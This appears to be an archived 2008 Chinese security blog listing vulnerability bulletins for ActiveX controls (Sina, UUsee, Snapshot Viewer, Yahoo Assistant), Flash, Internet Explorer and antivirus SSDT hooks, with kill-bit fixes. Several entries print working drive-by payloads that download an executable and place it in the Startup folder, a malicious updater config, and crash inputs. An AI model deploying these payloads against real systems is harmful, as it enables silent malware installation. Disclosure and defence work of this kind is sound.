This theme is downloaded from wordpress themes website.

Archive for the '漏洞公告' Category

新浪DLoader Class ActiveX控件任意文件下载漏洞

发布日期:2008-7-18

最后更新日期:2008-7-18   1557GMT)

受影响系统:

Sina UC

新浪网络电视

详细: 

知道安全于近期捕获该漏洞的利用代码,在7月份网络上已经出现利用此漏洞的攻击代码.可导致用户在访问到黑客构造的攻击网页后,可能将恶意文件下载到系统安装,并且随着系统启动而执行.


测试方法:

以下代码可能包含恶意行为,请勿轻易尝试,使用者风险自负.

<HTML><HEAD>
<META http-equiv=Content-Type content=”text/html; charset=gb2312″>
<META content=”MSHTML 6.00.2900.3354″ name=GENERATOR></HEAD>
<BODY>
<OBJECT id=install classid=clsid:78ABDC59-D8E7-44D3-9A76-9A0918C52B4A></OBJECT>
<SCRIPT>
var YEtYcJsR1=”http://127.0.0.1/xxx.exe”;
install[”DownloadAndInstall”](YEtYcJsR1);
</SCRIPT>
</BODY></HTML>

推荐的应对方法:

目前厂商已经发布新浪网络电视修复版本并且进行强制升级.请用户及时更新软件.

UC的用户请继续关注http://www.51uc.com/进行更新.

也可以为clsid:78ABDC59-D8E7-44D3-9A76-9A0918C52B4A设置kill bit.

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{78ABDC59-D8E7-44D3-9A76-9A0918C52B4A}]
“Compatibility Flags”=dword:00000400

安装365门神(WESEC)软件,对IE浏览器在打开网站的时候进行保护,拦截来自网络带有恶意代码的网页攻击。使用帮助和下载:http://www.scanw.com/

Popularity: 100% [?]

漏洞公告 GreySign 18 Jul 2008 No Comments

Microsoft Office Snapshot Viewer ActiveX Exploit

发布日期:2008-7-10

最后更新日期:2008-7-10   1557GMT

受影响系统:

Microsoft Access 2003
Microsoft Access 2002
Microsoft Access 2000
Microsoft Snapshot Viewer 10.0.4622

 详细: 

 知道安全于近期捕获该漏洞的利用代码,由于该漏洞利用起来影响范围广,执行速度快,目前已经开始被黑客积极利用.

受到影响的产品主要是Microsoft Access2003以及之前的版本,或者安装了Microsoft Snapshot Viewer 的系统都可能遭受攻击.

Microsoft Access中捆绑了快照工具Microsoft Snapshot Viewer,由于该工具的控件没有正确验证SnapshotPath,
CompressedPath的参数,导致用户在访问到黑客构造的攻击网页后,可能将恶意文件下载到任意位置,并且随着系统启动而执行.


测试方法:

<html>
<object classid=’clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9′ id=’obj’></object>
<script language=’javascript’>
var buf1 = ‘http://http://www.scanw.com/greysign/test.exe’;
var buf2 = ‘C:/Documents and Settings/All Users/「开始」菜单/程序/启动/test.exe’;
obj.SnapshotPath = buf1;
obj.CompressedPath = buf2;
obj.PrintSnapshot();
</script>
</html>


推荐的应对方法:

目前厂商尚未发布补丁程序.建议使用此软件的用户关注以下地址进行更新:

http://www.microsoft.com/technet/security/

将以下CLSID设置KILLBIT:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{F0E42D50-368C-11D0-AD81-00A0C90DC8D9}]
“Compatibility Flags”=dword:00000400

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{F0E42D60-368C-11D0-AD81-00A0C90DC8D9}]
“Compatibility Flags”=dword:00000400

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{F2175210-368C-11D0-AD81-00A0C90DC8D9}]
“Compatibility Flags”=dword:00000400

安装365门神(WESEC)软件,对IE浏览器在打开网站的时候进行保护,拦截来自网络带有恶意代码的网页攻击。使用帮助和下载:http://www.scanw.com/

 

Popularity: 70% [?]

漏洞公告 GreySign 10 Jul 2008 No Comments

UUsee0DAY网马已在互联网进行传播

发布日期:2008-6-16

最后更新日期:2008-6-17   1337GMT

关于UUSee网络电视:UUSee网络电视2008,是悠视网打造的一款全新网络电视收看软件,用户使用这款软件可以免费收看500多路新颖频道,共计1000多个精彩节目。

受影响版本:UUSee网络电视2008 4.0.0.32 (UUUpgrade.ocx 3.0.2.12)

描述:


近期知道安全应急团队捕获到利用UUsee网络电视的漏洞进行攻击的网页木马在互联网传播。实际上UUsee网马在今年一月已经开始流传,直到近期开始被传播。由于UUsee的升级控件(Clsid:{2CACD7BB-1C59-4BBB-8E81-6E83F82C813B}[UUUpgrade.ocx 3.0.2.12])在进行升级的时候没有对升级文件进行验证,所以可以通过构造恶意虚假的升级文件让UUsee下载特定的恶意程序并且运行。

部分代码如下:

try{var g; var storm=new ActiveXObject(”UUUPGRADE.UUUpgradeCtrl.1″);} catch(g){}; finally{if(g!=”[object Error]”){ var url=”http://***“; storm=(document.createElement(”object”)); ActivePerl=”-1C59-4BBB-8E8″; getSpraySlide=”1-6E83F82C813B”; helloworld2Address=”clsid:2CACD7BB”; storm.setAttribute(”classid”,helloworld2Address+ActivePerl+getSpraySlide) storm[”Update”](”\Program Files\Common Files\uusee\” ,url+”UU.ini”,”",1)}}

这段代码通过修改访问者的UU.ini,将UU.ini里的升级URL指向恶意文件来进行攻击,以下为UU.ini的内容:

[Global]
TotalVersion=5.4.15.81
SubPath=UUPlayer_2008
force=2
[Add]
UUSeeMediaCenter.exe=9.0.0.12
[Kill]
[Remove]
[UUSeeMediaCenter.exe]
Url=http://***/malware.cab
subpath=
reg=1
type=1

另外,网络上最早出现UUsee网马生成器的截图:

08061601.jpg

推荐的应对方法:

安装365门神(WESEC)软件,对IE浏览器在打开网站的时候进行保护,拦截来自网络带有恶意代码的网页攻击。使用帮助和下载:http://www.scanw.com/

日前悠视网已发布了UUSee网络电视2008最新的正式版本,该版本已经解决因ActiveX控件带来的0day漏洞问题,请用户立即到download.uusee.com下载最新版本。

 

Popularity: 54% [?]

漏洞公告 GreySign 16 Jun 2008 No Comments

FLASH网马悄然现身互联网

发布日期:2008-5-26

最后更新日期:2008-5-26   1737GMT

最近几天拦截到利用Adobe Flash Player SWF文件漏洞的网马,该网马通过网页加载一个正常的FLASH文件,再在那个FLASH文件里调用嵌入恶意构造的FLASH文件,这时会导致溢出,从而可能执行任意指令。以下为调用页内容:

 <script>
window.onerror=function(){return true;}
function init(){window.status=”";}window.onload = init;
if(document.cookie.indexOf(”play=”)==-1){
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie=”play=Yes;path=/;expires=”+expires.toGMTString();
if(navigator.userAgent.toLowerCase().indexOf(”msie”)>0)
{
document.write(’<object classid=”clsid:d27cdb6e-ae6d-11cf-96b8-444553540000″ codebase=”http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=4,0,19,0″ width=”0″ height=”0″ align=”middle”>’);
document.write(’<param name=”allowScriptAccess” value=”sameDomain”/>’);
document.write(’<param name=”movie” value=”http://www.XXX.cn/flash/XX.swf”/>’);
document.write(’<param name=”quality” value=”high”/>’);
document.write(’<param name=”bgcolor” value=”#ffffff”/>’);
document.write(’<embed src=”http://www.XXX.cn/flash/XX.swf” mce_src=”http://www.XXX.cn/flash/XX.swf”/>’);
document.write(’</object>’);
}else
{document.write(”<EMBED src=http://www.XXX.cn/flash/XX.swf width=0 height=0>”);}}
</script>  以下为正常的FLASH文件使用的脚本:

 // Action script…// [Action in Frame 1]
var flashVersion =/hxversion;
loadMovie(”http://www.XXX.cn/flash/” + flashVersion + “mal_swf.swf”, _root);
stop(); 该恶意FLASH部分内容如下:

0805026.jpg建议:


厂商补丁: Adobe
—–
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: http://www.adobe.com/go/getflash

Popularity: 78% [?]

漏洞公告 GreySign 26 May 2008 No Comments

Internet Explorer “Print Table of Links” Cross-Zone Scripting Vulnerability

<!–
Internet Explorer “Print Table of Links” Cross-Zone Scripting Vulnerability

Author: Aviv Raff
http://aviv.raffon.net/

Summary

Internet Explorer is prone to a Cross-Zone Scripting vulnerability in
its “Print Table of Links” feature. This feature allows users to add to
a printed web page an appendix which contains a table of all the links
in that webpage.

An attacker can easily add a specially crafted link to a webpage (e.g.
at his own website, comments in blogs, social networks, Wikipedia,
etc.), so whenever a user will print this webpage with this feature
enabled, the attacker will be able to run arbitrary code on the user’s
machine (i.e. in order to take control over the machine).

Affected version

Internet Explorer 7.0 and 8.0b on a fully patched Windows XP.
Windows Vista with UAC enabled is partially affected (Information Leakage only).
Earlier versions of Internet Explorer may also be affected.

Technical details

Whenever a user prints a page, Internet Explorer uses a local resource
script which generates an new HTML to be printed. This HTML consists of
the following elements: Header, webpage body, Footer, and if enabled,
also the table of links in the webpage.

While the script takes only the text within the link’s inner data, it
does not validate the URL of links, and add it to the HTML as it is.
This allows to inject a script that will be executed when the new HTML
will be generated.

As I said in a previous post, most of the local resources in Internet
Explorer are now running in Internet Zone. Unfortunately, the printing
local resource script is running in Local Machine Zone, which means that
any injected script can execute arbitrary code on the user’s machine.

Proof of Concept

The following is an example of a URL which executes Windows Calculator:

http://www.google.com/?q=<script defer>new ActiveXObject(“Wscript.Shell”).run(“calc”)</script>
–>

<html>
<body>
Print me with table of links to execute calc.exe
<a href=”http://www.bla.com?x=b<script defer >var x=new ActiveXObject(’WScript.Shell’);x.Run(’calc.exe’);</script>a.c<u>o</u>m”></a>
<script>window.print();</script>
</body>
</html>

/*www.scanw.com
           知道安全      */  

Popularity: 37% [?]

漏洞公告 GreySign 15 May 2008 No Comments

联众世界GLIEDown2.dll存在漏洞,网络出现相关网马

发布日期:2008-5-7

最后更新日期:2008-5-7   1237GMT

来自:知道安全

近期捕获了一个利用联众游戏世界的新漏洞网马,该网马利用联众世界的一个带有漏洞的Active控件进行攻击,安装有漏洞版本的联众世界的用户在访问该恶意页面会可能有导致下载任意程序并执行的危险。该攻击代码如下:

050701.jpg

影响版本:联众游戏大厅2.8.1.2.beta

目前官方尚未发布补丁。

建议用户使用365门神拦截恶意网站。

或者通过设置KillBit避免攻击:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{F917534D-535B-416B-8E8F-0C04756C31A8}]
“Compatibility Flags”=dword:00000400

Popularity: 48% [?]

漏洞公告 GreySign 07 May 2008 No Comments

Yahoo! 助手(3721) ActiveX远程代码执行漏洞

来自:http://hi.baidu.com/secway/blog/item/d9b45dddf0603bdc8d1029a9.html

Yahoo! 助手(3721) ActiveX远程代码执行漏洞

发现者: Sowhat of Nevis Labs
日期: 2008.05.06

http://hi.baidu.com/secway/blog/item/d9b45dddf0603bdc8d1029a9.html
http://secway.org/advisory/AD20080506EN.txt
http://secway.org/advisory/AD20080506CN.txt

CVE:    N/A

厂商
Yahoo! CN

受影响版本:
Yahoo! Assistant<=3.6 (04/23/2008之前版本)

Overview:
Yahoo!助手(原3721网络助手),是一个IE下的BHO (Browser Helper Object).

Yahoo!助手有许多功能,例如IE设置修复,安全防护,删除浏览的历史信息,拦截广告,等等.
更多信息,请参考
http://cn.zs.yahoo.com/

细节:

漏洞存在于ynotifier.dll这个ActiveX控件.
成功利用此漏洞可以使得攻击者能够在安装了Yahoo!助手的电脑上执行任意代码.
成功利用此漏洞需要诱使用户访问特定网页.

在通过IE初始化Ynoifier COM对象时,会出现一个可利用的内存破坏漏洞.

(c78.fa0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00e85328 ebx=001ada20 ecx=4080624c edx=00128474 esi=020cb5f0 edi=00000000
eip=43f50743 esp=001283e0 ebp=00128478 iopl=0         nv up ei pl zr na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000             efl=00010246
43f50743 ??               ???

637a8b47 8b45f8           mov     eax,[ebp-0×8]
637a8b4a 8b08             mov     ecx,[eax]
637a8b4c 8d55fc           lea     edx,[ebp-0×4]
637a8b4f 52               push    edx
637a8b50 6a01             push    0×1
637a8b52 50               push    eax
637a8b53 ff5158           call    dword ptr [ecx+0×58] ; ds:0023:408062a4=43f50743

此处虚函数指向了一个无效的数据.

利用堆填充技术,攻击者可以通过利用此漏洞执行任意代码.

Proof of Concept:
只需要下面这行代码保存成HTML文件,即可触发漏洞
<object classid=’clsid:2283BB66-A15D-4AC8-BA72-9C8C9F5A1691′>

Workaround:
对此ActiveX设置一个Killbit.

厂商回应:

2008.04.23 通过邮件通知厂商
2008.04.23 厂商回复,开发补丁
2008.04.23 补丁开发完毕,但厂商希望能够推迟公布细节,因为厂商需要时间推送补丁
2008.05.06 发布公告.(厂商没有发布任何公告)

Popularity: 38% [?]

漏洞公告 GreySign 06 May 2008 No Comments

迅雷DownAndPlay.dll模块远程溢出

 来自:http://hi.baidu.com/dummy24/blog/item/bb0a3c11cfcaf57bcb80c4b3.html

/*
抱歉,没有仔细注意这个问题。这个洞的确没办法远程溢出。
*/

迅雷DownAndPlay.dll随迅雷起来后(不知道这个模块在从那个版本开始出现,我这是最新版本),在本地绑定36897端口,等待链接,
接受的数据格式是 XLDAP|key|value|XLDAP, 其中的 key 由预定义的几个,
这里实现溢出选择的是 savepath, 当value 超长时就会在 spintf 处发生溢出。
附件的 11.dat 是在 临时构造的 一份数据,可以使用 nc 看看效果,运行命令,
迅雷会因为异常退出。

有兴趣试着写出完整攻击代码。

C:\>nc 127.0.0.1 36897 <11.dat

23132CB6     8D45 A0          lea      eax, dword ptr [ebp-60]
23132CB9     E9 84010000      jmp      23132E42
23132CBE     68 B4C61323      push     2313C6B4                          ; ASCII “savepath”
23132CC3     57               push     edi
23132CC4     FFD6             call     esi
23132CC6     59               pop      ecx
23132CC7     84C0             test     al, al
23132CC9     59               pop      ecx
23132CCA     74 5F            je       short 23132D2B
23132CCC     8B75 0C          mov      esi, dword ptr [ebp+C]
23132CCF     8B0D E0D21323    mov      ecx, dword ptr [2313D2E0]
23132CD5     56               push     esi
23132CD6     E8 EBE5FFFF      call     231312C6
23132CDB     8B46 04          mov      eax, dword ptr [esi+4]
23132CDE     8B0D B0E41323    mov      ecx, dword ptr [<&MSVCP60.`std::>; MSVCP60.`std::basic_string<char,std::char_traits<char>,std::allocator<char> >::_Nullstr’::`2′::_C
23132CE4     85C0             test     eax, eax
23132CE6     8BD1             mov      edx, ecx
23132CE8     74 02            je       short 23132CEC
23132CEA     8BD0             mov      edx, eax
23132CEC     8B7F 04          mov      edi, dword ptr [edi+4]
23132CEF     85FF             test     edi, edi
23132CF1     74 02            je       short 23132CF5
23132CF3     8BCF             mov      ecx, edi
23132CF5     B8 D4C61323      mov      eax, 2313C6D4                     ; ASCII “XLDAP”
23132CFA     50               push     eax
23132CFB     52               push     edx
23132CFC     51               push     ecx
23132CFD     50               push     eax
23132CFE     8D85 5CFEFFFF    lea      eax, dword ptr [ebp-1A4]
23132D04     68 C0C61323      push     2313C6C0                          ; ASCII “%s|%s|%s|%s”
23132D09     50               push     eax

溢出发生位置
23132D0A     FF15 54E51323    call     dword ptr [<&MSVCRT.sprintf>]     ; MSVCRT.sprintf
23132D10     8D85 5CFEFFFF    lea      eax, dword ptr [ebp-1A4]
23132D16     50               push     eax

080506.JPG

Popularity: 40% [?]

漏洞公告 GreySign 06 May 2008 No Comments

警惕:各大杀毒软件存在严重漏洞

发布日期:2008-4-29

最后更新日期:2008-4-29 21:37GMT
知道安全

感谢AYANAMI REI的翻译。

Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/

对多款杀毒软件和防火墙的SSDT Hook函数的参数验证不严
*报告信息*

标题:对多款杀毒软件和防火墙的SSDT Hook函数的参数验证不严
报告ID: CORE-2008-0320
报告URL: http://www.coresecurity.com/?action=item&id=2249
发布日期: 2008-04-28
最后更新日期: 2008-04-28
包含厂商: BitDefender, Comodo, Sophos和瑞星
发布模式: 协调发布(BitDefender, Comodo, Rising), 用户发布 (Sophos)
*漏洞信息*

类别:无效内存参数
可远程利用:否
可本地利用:是
Bugtraq ID:28741,28742,28743,28744
CVE 名称:CVE-2008-1735, CVE-2008-1736, CVE-2008-1737, CVE-2008 -1738
*漏洞描述*

通过对多款杀毒软件和防火墙的(BitDefender Antivirus [1], Comodo  Firewall [2], Sophos Antivirus [3]和瑞星杀毒软件[4])的SSDT hook 函数的粗略检查发现可以导致拒绝服务(DOS),并可能执行代码攻击。 攻击者利用这些缺陷可以本地重启系统,关闭防火墙和杀毒软件保护。然 而,很多情况下它可能利用这些bug导致在特权内核模式下执行任意代码 。

*漏洞影响版本*

. BitDefender Antivirus 2008 Build 11.0.11
. Comodo Firewall Pro 2.4.18.184
. Sophos Antivirus 7.0.5
. 瑞星杀毒软件19.60.0.0 and 19.66.0.0
. 旧版本未测试,可能会被影响.
*不受影响的版本*

. BitDefender Antivirus 2008版本可以通过自动更新更新至一月18号之 后的版本
. Comodo Firewall Pro 3.0
. 瑞星杀毒软件20.38.20
*厂商信息,解决方案和其他*

1) BITDEFENDER ANTIVIRUS (BID 28741, CVE-2008-1735)

根据BitDefender的说明,这个缺陷尚未被恶意程序利用,并且可通过自 动更新修正。这一问题的信息可以在BitDefender的网站上找到: http://kb.bitdefender.com/KB419-en–Security-vulnerability-in- BitDefender-2008.html
2) COMODO FIREWALL PRO (BID 28742, CVE-2008-1736)

这个漏洞在Comodo Firewall Pro 3.0中被修正,新版本在 http://www.personalfirewall.comodo.com/download_firewall.html下 载
3) SOPHOS ANTIVIRUS (BID 28743, CVE-2008-1737)

厂商声明:“在windows 2000,2003和XP下的Sophos Anti-Virus 7.x将 会受此漏洞影响。”不受影响的SOPHOS产品包括早起的SOPHOS windows杀 毒软件,SOPHOS飞windows平台杀毒软件和其他SOPHOS产品。

这个漏洞只有在实时行为分析开启状态才可以利用。它需要用户将web浏 览器的安全设置调整到默认级别以下或者允许从网页上启动ActiveX或 Java Applet。

可以使用以下方法避免漏洞被利用:

a. 使用默认的安全设置或较高级别的最新版本Web浏览器。作为通用的安 全管理,我们不建议用户下载ActiveX或者Java Applets,除非你信任他 的内容。

b. 关闭Sophos Anti-Virus的实时行为分析功能。(用户仍会受到Sophos 行为遗传分析和其他方式的对抗恶意软件的保护手段的保护。)

N.B. 如果攻击程序被放出,Sophos将会部署保护以对抗攻击程序。

漏洞的修复需要用户重新启动终端。鉴于为非紧急漏洞,为了尽量不打扰 我们的客户,Sophos将会尽早的在一个需要重新启动的产品中包含这个修 正。
4) RISING ANTIVIRUS (BID 28744, CVE-2008-1738)

瑞星杀毒软件的修正版可以在 http://rsdownload.rising.com.cn/for_down/rsfree/ravolusrfree.exe 下载。

所有的瑞星用户都可以通过自动更新更新到修补过的版本。
*荣誉归功于*

这些漏洞(除了瑞星)是被Core Security Technologies的Damian  Saura, Anibal Sacco, Dario Menichelli, Norberto Kueffner, Andres  Blancoy Rodrigo Carvalho在bugweek 2007时发现的。瑞星漏洞是被Core
Security Technologies exploit writers team的Anibal Sacco发现的。
*技术描述/poc代码*

我们发现BitDefender Antivirus, 瑞星杀毒软件, Comodo
Firewall和Sophos Antivirus并没有在使用hook函数时验证参数,导致程序试图转向无效内存,导致BSOD(Blue Screen of Death)。

在我们的测试中,我们使用了内核hook探测工具BSODhook [5]去寻找任何形式的未被充分验证的SSDT hook参数。从Matousec的文件[6]:

“Hooking kernel functions by modifying the System Service Descriptor
Table (SSDT) is a very popular method of implementation of additional
security features and is used frequently by personal firewalls and other
security and low-level software. Although undocumented and despised by
Microsoft, this technique can be implemented in a correct and stable
way. However, many software vendors do not follow the rules and
recommendations for kernel-mode code writing and many drivers that
implement SSDT hooking do not properly validate the parameters of the
hooking functions.”

“Hooking SSDT functions requires extra caution. SSDT function handlers
are executed in the kernel mode but their callers are executed in the
user mode. Hence all function arguments come from the user mode. This is
why it is necessary to validate these arguments properly. Otherwise a
simple user call can easily crash the whole system. This bug usually
results in a system crash. However, it may happen that this bug is even
more dangerous and may lead to the execution of an arbitrary code in the
privileged kernel mode.”

A local DoS attack, despite not being a very sophisticated intrusion
attack, could be used as an accessory under several scenarios. It is
commonly used by viruses as added feature, when the specific AV is
detected on the infected machine, crashing the system just to annoy. Or
by a human attacker, after a succesful remote intrusion with
unprivileged credentials to make a computer resource unavailable to its
intended users. Besides, this could be a very valuable resource when
trying to fake some service that answers broadcasts request like a DHCP,
allowing to start the service in another location replacing the original
one.

1) BITDEFENDER ANTIVIRUS (BID 28741, CVE-2008-1735)

BitDefender fails to validate the pointer to the ‘CLIENT_ID’ structure
provided to ‘NtOpenProcess’. So, if we pass an invalid pointer, we will
crash the whole system.

/———–

NtOpenProcess(PHANDLE ProcessHandle,
ACCESS_MASK AccessMask,
POBJECT_ATTRIBUTES ObjectAttributes,
PCLIENT_ID ClientId )

.text:00010ADE push 0Ch
.text:00010AE0 push offset stru_114E8
.text:00010AE5 call __SEH_prolog
.text:00010AEA call KeGetCurrentThread
.text:00010AEF xor ebx, ebx
.text:00010AF1 cmp [eax+140h], bl
.text:00010AF7 jz short loc_10B0D
.text:00010AF9 call PsGetCurrentProcessId
.text:00010AFE call PsGetCurrentProcessId
.text:00010B03 push eax
.text:00010B04 call sub_10724
.text:00010B09 test eax, eax
.text:00010B0B jnz short loc_10B12
.text:00010B0D
.text:00010B0D loc_10B0D: ; CODE XREF: sub_10ADE+19_j
.text:00010B0D push [ebp+ClientId]
.text:00010B10 jmp short loc_10B73

.text:00010B12
.text:00010B12 loc_10B12: ; CODE XREF: sub_10ADE+2D_j
.text:00010B12 mov edi, [ebp+ClientId]
.text:00010B15 cmp edi, ebx ; Little check to avoid a
Null Pointer

- ———–/

Here it gets the pointer to the ‘ClientId’ value, and if it is non zero
(’!= 0′) it does not care where it is pointing to.

/———–

.text:00010B17 jnz short loc_10B1C
.text:00010B19 push ebx
.text:00010B1A jmp short loc_10B73

.text:00010B1C
.text:00010B1C loc_10B1C: ; CODE XREF: sub_10ADE+39_j
.text:00010B1C mov [ebp+ms_exc.disabled], ebx
.text:00010B1F mov esi, [edi] ; Here it crashes

- ———–/

It access to that memory, and if that is invalid memory the system will
crash.

/———–

.text:00010B21 mov [ebp+var_1C], esi
.text:00010B24 or [ebp+ms_exc.disabled], 0FFFFFFFFh
.text:00010B28 jmp short loc_10B3B
.text:00010B28 sub_10ADE endp

- ———–/

2) COMODO FIREWALL PRO (BID 28742, CVE-2008-1736)

In Comodo there are problems in the arguments validation of
‘NtDeleteFile’, ‘NtCreateFile’ and ‘NtSetThreadContext’ functions.
‘NtDeleteFile’ receives just one parameter, a pointer to an
‘OBJECT_ATTRIBUTES’ structure. These attributes would include the
‘ObjectName’ and the ‘SECURITY_DESCRIPTOR’, for example. This is the
hook placed by Comodo at ‘NtDeleteFile’.

/———–

NTDeleteFile (POBJECT_ATTRIBUTES ObjectAttributes)

.text:0001ACB0 push 1Ch
.text:0001ACB2 push offset stru_1E3F0
.text:0001ACB7 call __SEH_prolog
.text:0001ACBC xor ebx, ebx
.text:0001ACBE inc ebx
.text:0001ACBF mov [ebp+var_1C], ebx
.text:0001ACC2 xor esi, esi
.text:0001ACC4 mov [ebp+var_24], esi
.text:0001ACC7 mov [ebp+var_20], ebx
.text:0001ACCA mov [ebp+var_28], esi
.text:0001ACCD mov [ebp+ms_exc.disabled], esi
.text:0001ACD0 call ds:ExGetPreviousMode
.text:0001ACD6 mov edi, [ebp+ObjectAttributes]

- ———–/

Here it does a lot of ‘ProbeForRead’ checks to see if the pointers of
the structure are valid. Nice! (’EDI’ still has a pointer to the
‘OBJECT_ATTRIBUTES’ structure)

/———–

….
.text:0001AD25 push edi ; ObjectAttributes
.text:0001AD26 call sub_1A692 ; Here it passes the
OBJECT_ATTRIBUTES structure pointer to the next function.

sub_1A692
.text:0001A692 push 28h
.text:0001A694 push offset stru_1E3C0
.text:0001A699 call __SEH_prolog
.text:0001A69E xor edi, edi
….
.text:0001A6B3 mov [ebp+ms_exc.disabled], edi
.text:0001A6B6 push 72747052h ; Tag
.text:0001A6BB mov ebx, 400h
.text:0001A6C0 push ebx ; NumberOfBytes
.text:0001A6C1 push 1 ; PoolType
.text:0001A6C3 call ds:ExAllocatePoolWithTag ; Allocates memory to
hold the data retrieved by ZwQueryObject
.text:0001A6C9 mov esi, eax
.text:0001A6CB mov [ebp+var_28], esi
.text:0001A6CE cmp esi, edi
.text:0001A6D0 jz short loc_1A74F

.text:0001A6D2 mov edi, [ebp+ObjectAttributes]
.text:0001A6D5 mov eax, [edi+OBJECT_ATTRIBUTES.RootDirectory] ;
Here, the code retrieves the RootDirectory’s field value from the
structure, controled by us.
.text:0001A6D8 test eax, eax
.text:0001A6DA jz short loc_1A71B

.text:0001A6DC push 0 ; ReturnLength
.text:0001A6DE push ebx ; ObjectInformationLength
.text:0001A6DF push esi ; ObjectInformation
; buffer where ZwQueryObject will put the object information

.text:0001A6E0 push 1 ; ObjectInformationClass
; Specifies an OBJECT_INFORMATION_CLASS value that determines the type
; of information returned in the ObjectInformation buffer. It’s using
; an undocumented type (OBJECT_NAME_INFORMATION) which returns an
UNICODE_STRING structure
.text:0001A6E2 push eax ; ObjectHandle
; Now, the user-controlled handle ‘ll be used here to identify the
object by ZwQueryObject,
.text:0001A6E3 call ds:ZwQueryObject
.text:0001A6E9 mov [ebp+var_20], eax
.text:0001A6EC test eax, eax
.text:0001A6EE jl short loc_1A746

- ———–/

Here is where the problem shows up. The code does not properly validates
the data retrieved by ‘ZwQueryObject’, expecting an ‘UNICODE_STRING’
structure. But it is possible to make multiple calls to the function
using different handlers to obtain a null structure crashing the system
when the code tries to dereference its ‘Buffer’ field.

/———–

.text:0001A6F0 movzx eax, [esi+UNICODE_STRING.Length]
.text:0001A6F3 shr eax, 1
.text:0001A6F5 mov ecx, [esi+UNICODE_STRING.Buffer]
.text:0001A6F8 movzx eax, word ptr [ecx+eax*2-2] ; Here is the problem
.text:0001A6FD mov [ebp+var_30], eax
.text:0001A700 cmp ax, 5Ch
.text:0001A704 jz short loc_1A725

- ———–/

3) SOPHOS ANTIVIRUS (BID 28743, CVE-2008-1737)

Insufficient argument validation of hooked SSDT functions on Sophos lead
to a DoS. An attacker, utilizing this flaw, would be able to locally
reboot the whole system shutting down the Firewall or AV protection.
Although neither the vendor nor Core Security has found a means of
exploiting the flaw to execute arbitrary code, it has not been possible
to rule this out.

In Sophos AV there is a problem in the arguments validation of
‘NtCreateKey’ function.

/———–

int __cdecl NtCreateKeyHook(PHANDLE pKeyHandle,
ACCESS_MASK DesiredAccess,
POBJECT_ATTRIBUTES ObjectAttributes,
ULONG TitleIndex,PUNICODE_STRING Class,
ULONG CreateOptions,
PULONG Disposition)

[…]
.text:0001C01C push 4 ; Alignment
.text:0001C01E push 18h ; Length
.text:0001C020 mov esi, [ebp+ObjectAttributes]
.text:0001C023 push esi ; Address
.text:0001C024 call ds:ProbeForRead

- ———–/

Here it checks for ‘ObjectAttributes’ to be pointing to a valid address.

/———–

.text:0001C02A mov eax, [esi+OBJECT_ATTRIBUTES.RootDirectory]
.text:0001C02D mov [ebp+Handle], eax
.text:0001C030 mov esi, [esi+OBJECT_ATTRIBUTES.ObjectName]
.text:0001C033 mov [ebp+pUnicodeString], esi

- ———–/

Now, it gets from ‘OBJECT_ATTRIBUTES’ a handle and a pointer to an
‘UNICODE_STRING’ structure.

/———–

.text:0001C095 push 4
.text:0001C097 push 8
.text:0001C099 push esi
.text:0001C09A mov ebx, ds:ProbeForRead
.text:0001C0A0 call ebx ; ProbeForRead, it checks the
pointer before the dereference.

.text:0001C0A2 mov eax, dword ptr [esi+UNICODE_STRING.Length]
.text:0001C0A4 mov dword ptr [ebp+stUnicodeString.Length], eax
.text:0001C0A7 mov esi, [esi+UNICODE_STRING.Buffer] ; And gets
from the UNICODE_STRING structure
; a pointer to the unicode buffer.
.text:0001C0AA mov [ebp+stUnicodeString.Buffer], esi
.text:0001C0AD push 2 ; Alignment
.text:0001C0AF shr eax, 10h
.text:0001C0B2 push eax ; Length
.text:0001C0B3 push esi ; Address
.text:0001C0B4 call ebx ; ProbeForRead

- ———–/

It does the check, but here is the problem

/———–

.text:0001C0B6 push gdwValue
.text:0001C0BC lea eax, [ebp+stUnicodeString]
.text:0001C0BF push eax
.text:0001C0C0 push [ebp+Object]
.text:0001C0C3 call sub_1cb40

- ———–/

The problem relies in the function not properly checking the ‘Length’
field of the ‘UNICODE_STRING’ structure. When doing the check,
‘ProbeForRead’ receives the length field of the structure as a parameter
without any kind of validation.

So, if we set this field to 0, ‘ProbeForRead’ will not raise any
exception even though we were passing it an invalid address. And it will
crash when trying to access to the desired invalid memory.

/———–

sub_1cb40

[…]
.text:0001CB5E xor esi, esi
.text:0001CB60 mov [ebp+ms_exc.disabled], esi
.text:0001CB63 mov edi, [ebp+pUnicodeString]
.text:0001CB66 mov eax, [edi+UNICODE_STRING.Buffer]

- ———–/

And here is where it will crash:

/———–

.text:0001CB69 cmp word ptr [eax], ‘\’ ; Reference the first
pointed byte

- ———–/

4) RISING ANTIVIRUS (BID 28744, CVE-2008-1738)

In Rising antivirus the code of the ‘NtOpenProcess’ hook does not
validates if the pointer to the structure

/———–

typedef struct _CLIENT_ID {
HANDLE UniqueProcess;
HANDLE UniqueThread;}

- ———–/

is really pointing to mapped memory. So, when the code tries to
dereference the pointer to check the ‘CLIENT_ID->UniqueProcess’ value,
if it is pointing to invalid memory, will crash.

/———–

NtOpenProcess( OUT PHANDLE ProcessHandle,
IN ACCESS_MASK AccessMask,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN PCLIENT_ID ClientId )

.text:00010EAA push ebp
.text:00010EAB mov ebp, esp
.text:00010EAD push esi
.text:00010EAE mov esi, offset Addend
.text:00010EB3 push edi
.text:00010EB4 mov ecx, esi ; Addend
.text:00010EB6 call ds:InterlockedIncrement
.text:00010EBC call PsGetCurrentProcessId
.text:00010EC1 cmp eax, dword_11C8C
